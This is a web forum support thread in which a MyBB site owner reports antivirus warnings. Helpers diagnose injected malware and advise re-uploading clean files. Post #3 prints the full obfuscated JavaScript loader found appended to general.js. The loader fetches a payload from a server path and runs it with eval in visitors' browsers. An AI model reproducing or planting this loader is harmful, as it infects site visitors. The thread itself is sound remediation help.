Solved: 2 Years, 7 Months, 3 Weeks ago warning about infected file
#1
Solved: 2 Years, 7 Months, 3 Weeks ago
hello all.
I have a problem in my forum and I cant see the problem.
My forum cant pass in eset security or others antivirus, like bitdefender, this last one warning me with this text

Recurso:Detecção Ameaças Online

Bloqueamos esta página perigosa para a sua proteção: https://www.pt4um.com/forum/jscripts/general.js?ver=1821 Nome da ameaça: JS:Trojan.JS.Agent.UJY Páginas perigosas tentam instalar software que pode prejudicar o dispositivo, reunir informações pessoais ou operar sem o seu consentimento.
*******
Feature: Online Threat Detection
We have blocked this dangerous page for your protection: https://www.pt4um.com/forum/jscripts/general.js?ver=1821 Threat Name: JS:Trojan.JS.Agent.UJY Dangerous pages attempt to install software that can harm your device, gather personal information, or operate without your consent.


How can I fix, this? I just reinstall the forum and try disable all plugins, but the problem maintain.

Any help?
thanks
Begincaos
---@@@---

[Image: assinatura.jpg]
Reply
#2
Solved: 2 Years, 7 Months, 3 Weeks ago
Well, avast thinks that https://www.pt4um.com/ is a phishing page... The trouble seems to be with your site, globaly.
Tchat en français
Do not ask me help through PM or Discord

Reply
#3
Solved: 2 Years, 7 Months, 3 Weeks ago
Your files have been infected, the javascript contains this at the end of the file:

;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//pt4um.com/Preview/auth.securechaseic5/auth.securechaseic5.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};

Download a fresh copy of MyBB and upload the entire thing over your current files, but before you do that, make a note of when /jscripts/general.js was last modified, and provide this information to your host to see if they can help you track down how this happened.
MyReactions - All Plugins

Can you still feel the butterflies?

Free never tasted like pudding.
Reply
#4
Solved: 2 Years, 7 Months, 3 Weeks ago
You'll also want to upload fresh copies of files for all plugins, as a javascript file for MyAdvertisments is infected too: https://www.pt4um.com/forum/jscripts/mya...sements.js

Essentially you need to upload fresh copies of all files on your site.
MyReactions - All Plugins

Can you still feel the butterflies?

Free never tasted like pudding.
Reply
#5
Solved: 2 Years, 7 Months, 3 Weeks ago
thank you all. I upload a fresh copy and dont have more problem whit infected files.
Begincaos
---@@@---

[Image: assinatura.jpg]
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)